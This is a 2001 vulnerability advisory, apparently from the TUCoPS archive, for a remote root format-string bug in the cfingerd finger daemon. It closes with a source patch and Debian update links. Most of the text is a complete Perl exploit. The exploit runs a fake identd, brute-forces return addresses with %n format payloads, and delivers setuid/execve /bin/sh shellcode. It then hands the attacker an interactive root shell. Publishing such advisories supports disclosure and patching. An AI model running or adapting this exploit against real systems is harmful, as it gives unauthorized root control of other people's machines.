Vulnerability
cfingerd
Affected
cfingerd <=1.4.3
Description
Megyer Laszlo found following. There is a critical bug in cfingerd
daemon <= 1.4.3, (a classic format bug) that makes possible
to acquire full control over the remote machine if it runs the
cfingerd program, the configurable and secure finger daemon. In 3
words: REMOTE ROOT VULNERABILITY.
The bug occurs in main.c, line 245, 258 and 268:
syslog(LOG_NOTICE, (char *) syslog_str);
We can control the syslog_str with our ident user, that goes
directly to the secont parameter of syslog(). Using %n and some
tricks, we can overwrite anything in the daemon's memory,
including the saved eip register.
The more or less proper usage of syslog this time is here:
syslog(LOG_NOTICE, "%s", (char *) syslog_str);
There are many papers about format bugs, so we don't write
detailed infos about it.
Exploiting it is a bit tricky because we use another bug in the
code. The ident reply is something like this:
3478, 79 : UNIX : USERID : username
If the username is more than 64 bytes, cfingerd logs some strange
string:
[64b username]3478, 79 : UNIX : USERID : [64b username][rest of the username]
The following code is responsible of this strange behaviour:
for (xp=uname; *cp != '\0' &&
*cp!='\r'&&*cp!='\n'&&strlen(uname)<sizeof(uname); cp++)
*(xp++) = *cp;
You can see that no space is left for the string terminating '\0'
character, so the next local variable which is the line that was
read from identd will also be returned as the end of the username.
Example, the fake identd sends:
[120 B's] : : :[64 A's]
the username that is returned by get_rfc1413_data() will be:
[64 A's][120 B's] : : :...
Then an snprintf cuts the string that will go to syslog() allowing
only 200 bytes to pass. If the username is one byte, we will have
183 bytes we can control there. ("a fingered from username@host")
where host doesn't have place, so it won't get into syslog().
(another sechole).
Now we have a method to send 183 bytes to syslog(). We have to
find out some basic variables to be able to exploit this, which
we can bruteforce easily one-by-one (details in "fingex" exploit).
#!/usr/bin/perl
# Cfingerd exploit to the recent syslog format bug.
# Discovered and written by Lez <abullah@freemail.hu> in 2001.
# you have to use it as root to bind port 113.
# tested on Debian 2.1, 2.2
use IO::Socket;
#use strict;
my $network_timeout=5;
my $sleep_between_fingers=2; # should be enough
my $debug_sleep=0;
my $fingerport=79;
my $target=$ARGV[0];
my $debug=1;
my $test_vulnerability=1;
# Debian 2.2, cfingerd 1.4.1-1
#my $control=33; # if don't set it, exploit will find.
#my $align=0; # the same
#$retaddr=0xbffffab0;
# my $retaddr=0xbffff880; # the same
#$retaddr=0xbffff840;
my $retvalue=0xbffff980; # If it finds everything correctly, and says Shell lunched, but
# you can't find your uid 0, decrease $retvalue by 30.
my $bytes_written=32;
#$control=17;
#$align=0;
#$retaddr=0xbffffb80; #(or 0xbffffb68 0xbffff9d0 0xbffff9cc 0xbffff9c8)
#$retvalue=0xbffffc20;
#$bytes_written=32;
# GOOD:
my $startsig11=0xbffffbfc;
my $endsig11= 0xbffff000;
my $controlstart=45;
my $controlend=1;
my $fclient;
my $shellcode ="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xb0\x2e\xcd\x80".
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b".
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd".
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#59 bytes
if (!$target) {print "Usage: $0 target\n";exit}
# Starting fake identd
my $identd = IO::Socket::INET->new(
Listen => 5,
LocalPort => 113,
Proto => 'tcp',
Reuse => 3) or die "Cannot listen to port 113: $!\n";
if ($test_vulnerability) {&testvuln}
if (!$control) { &get_control_and_align }
else {print "Alignment: $align\nControl: $control\n" }
if (!$retaddr) {
&find_and_exploit_sigsegv_values
}
else {
printf "Using provided RET address: 0x%x\n",$retaddr;
&exploit ($retaddr, $retvalue);
}
exit;
sub sendthisone { #sends a string to cfingerd, and returns 1 if the remote machine got SIGSEGV or SIGILL.
# a bit tricky
my $text_to_send=$_[0];
$text_to_send =~ s/^\ /\ \ /;
my ($last_119, $gotback);
$fclient = IO::Socket::INET->new("$target:$fingerport") or die "Cannot connect to $target: $!\n";
print $fclient "e\n"; # e is the username we query.
my $ident_client = $identd-> accept;
my $tmp=<$ident_client>;
my $first_64= substr($text_to_send, 0, 64);
if (length($text_to_send) > 64) {
$last_119= substr($text_to_send,64);
}
sleep $debug_sleep;
print $ident_client "$last_119: : :$first_64\n"; # we use an other bug
# in rfc query function
# to send longer lines.
close $ident_client;
eval {
local $SIG{ALRM} = sub { die "alarm\n"};
alarm ($network_timeout);
$gotback= <$fclient>;
alarm 0;
};
if ($@) {
die unless $@ eq "alarm\n";
&shell;
}
if ($gotback =~ /SIGSEGV/i) {
if ($debug == 2) {print "Sending $first_64$last_119: SIGSEGV\n";}
elsif ($debug == 1) {system ("echo -n \"*\"");}
sleep ($sleep_between_fingers);
return 1;
} elsif ($gotback =~ /SIGILL/i) {
if ($debug == 2) {print "Sending $first_64$last_119: SIGILL\n";}
elsif ($debug == 1) {system ("echo -n +");}
print "Got signal \"Illegal instruction\".\nThe ret address is not correct\n";
sleep ($sleep_between_fingers);
return 1;
} else {
if ($debug == 2) {print "Sending $first_64$last_119\n";}
elsif ($debug == 1) {system ("echo -n .");}
sleep ($sleep_between_fingers);
return 0;
}
}
sub get_control_and_align {
for ($control=$controlstart; $control >= $controlend; $control--) {
for ($align=3; $align>=0; $align--) {
my $s1= "A"x$align . "\x79\xff\xff\xbe" . "%" . $control . "\$n";
my $s2= "A"x$align . "\x79\xff\xff\xbf" . "%" . $control . "\$n";
if (sendthisone($s1) > sendthisone ($s2)) {
print "\nControl: $control\nAlign: $align\n";
return;
}
}
}
die "Could not find control and alignment values\n";
}
sub find_and_exploit_sigsegv_values {
my ($sendbuf, @back, $addy, $retaddr, $save);
print "Searching for eip addresses...\n";
for ($addy=$startsig11; $addy >= $endsig11; $addy -=4) {
$sendbuf = "a"x$align . pack "cccc",$addy,$addy>>8,$addy>>16,$addy>>24;
$sendbuf .= "%" . $control . "\$n";
if ($addy%0x100) {
if (sendthisone($sendbuf)) {
&exploit ($addy, $retvalue); # I'm so lazy
&exploit ($addy, $retvalue-60);
&exploit ($addy, $retvalue+60);
&exploit ($addy, $retvalue-120);
&exploit ($addy, $retvalue+120);
&exploit ($addy, $retvalue-180);
&exploit ($addy, $retvalue+180);
&exploit ($addy, $retvalue-240);
&exploit ($addy, $retvalue+240);
&exploit ($addy, $retvalue-300);
&exploit ($addy, $retvalue+300);
&exploit ($addy, $retvalue-360);
&exploit ($addy, $retvalue+360);
&exploit ($addy, $retvalue-420);
&exploit ($addy, $retvalue+420);
}
}
}
}
sub exploit {
my $addy=$_[0];
my $value=$_[1];
my $sendbuf;
printf "\nExploiting 0x%x, ret:0x%x.\n",$addy,$value;
$sendbuf = "Z"x$align;
$sendbuf .= &add_four_addresses($addy);
$sendbuf .= &add_format_strings($value);
$sendbuf .= "\x90"x (182-length($sendbuf)-length($shellcode));
$sendbuf .= $shellcode;
&sendthisone ($sendbuf);
}
sub add_four_addresses {
my $addy=$_[0];
my ($back, $i);
for ($i=0; $i<=3; $i++) {
$back .= pack "cccc",
($addy+$i),
($addy+$i)>>8,
($addy+$i)>>16,
($addy+$i)>>24;
}
return $back;
}
sub add_format_strings {
my ($back, $i, @a, $xvalue, $nvalue, $back);
my $ret=$_[0];
$a[0]=$ret%0x100-$bytes_written;
for ($i=1; $i<=3; $i++) {
$a[$i]= ($ret >> (8*$i) )%0x100 - ($ret >> (8*($i-1)) )%0x100;
}
for ($i=0; $i<=3; $i++) {
$xvalue= &positive($a[$i]);
$nvalue= $control+$i;
if ($xvalue <=8) {
$back .= "A"x$xvalue . "%".$nvalue."\$n";
} else {
$back .= "%0".$xvalue."x" . "%".$nvalue."\$n";
}
}
return $back;
}
sub positive {
my $number=$_[0];
while ($number < 0) {
$number += 0x100;
}
return $number;
}
sub shell {
my ($cucc, $msg);
print "Shell launched\n";
print $fclient "id\n";
print &my_line(1);
while (1) {
$cucc=<STDIN>;
print $fclient $cucc;
while ($msg=&my_line(1)) {
print $msg;
}
}
}
sub my_line {
my $msg;
eval {
local $SIG{ALRM} = sub { die "\n"};
alarm ($_[0]);
if ($msg=<$fclient>) {
alarm (0);
return $msg;
}
};
}
sub testvuln {
if ($debug) {print "Testing if fingerd is vulnerable... "}
if (&sendthisone ("%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n")) {
print "Yes.\n";
return;
} else {
print "No.\n";
exit;
}
}
Solution
The attached patch will fix the four bugs: 3 syslog() bugs and
the bug that allows anybody to send long usernames to syslog() so
the hostname wouldn't get there. To make a bugfixed source tree
save the diff as cfingerd-1.4.3.diff and do:
wget
http://www.infodrom.ffis.de/projects/cfingerd/download/cfingerd-1.4.3.tar.gz
tar xfz cfingerd-1.4.3.tar.gz
cat cfingerd-1.4.3.diff | patch -p0
and the source tree is free of this bug.
--- cfingerd-1.4.3/src/main.c.orig Fri Aug 6 23:33:38 1999
+++ cfingerd-1.4.3/src/main.c Wed Apr 11 18:55:43 2001
@@ -242,7 +242,7 @@
if (!emulated) {
snprintf(syslog_str, sizeof(syslog_str), "%s fingered (internal) from %s", username,
ident_user);
- syslog(LOG_NOTICE, (char *) syslog_str);
+ syslog(LOG_NOTICE, "%s", (char *) syslog_str);
}
handle_internal(username);
@@ -255,7 +255,7 @@
snprintf(syslog_str, sizeof(syslog_str), "%s fingered from %s",
prog_config.p_strings[D_ROOT_FINGER], ident_user);
- syslog(LOG_NOTICE, (char *) syslog_str);
+ syslog(LOG_NOTICE, "%s", (char *) syslog_str);
}
handle_standard(username);
@@ -265,7 +265,7 @@
snprintf(syslog_str, sizeof(syslog_str), "%s %s from %s", username,
prog_config.p_strings[D_FAKE_USER], ident_user);
- syslog(LOG_NOTICE, (char *) syslog_str);
+ syslog(LOG_NOTICE, "%s", (char *) syslog_str);
}
handle_fakeuser(username);
--- cfingerd-1.4.3/src/rfc1413.c.orig Sun Aug 29 14:14:25 1999
+++ cfingerd-1.4.3/src/rfc1413.c Wed Apr 11 18:53:45 2001
@@ -98,7 +98,7 @@
if (*(++cp) == ' ') cp++;
memset(uname, 0, sizeof(uname));
- for (xp=uname; *cp != '\0' && *cp!='\r'&&*cp!='\n'&&strlen(uname)<sizeof(uname); cp++)
+ for (xp=uname; *cp != '\0' && *cp!='\r'&&*cp!='\n'&&(strlen(uname)+1)<sizeof(uname); cp++)
*(xp++) = *cp;
if (!strlen(uname)) {
For Debian Linux:
http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1-1.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1-1.1.dsc
http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-alpha/cfingerd_1.4.1-1.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/cfingerd_1.4.1-1.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/cfingerd_1.4.1-1.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/cfingerd_1.4.1-1.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/cfingerd_1.4.1-1.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/cfingerd_1.4.1-1.1_sparc.deb
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
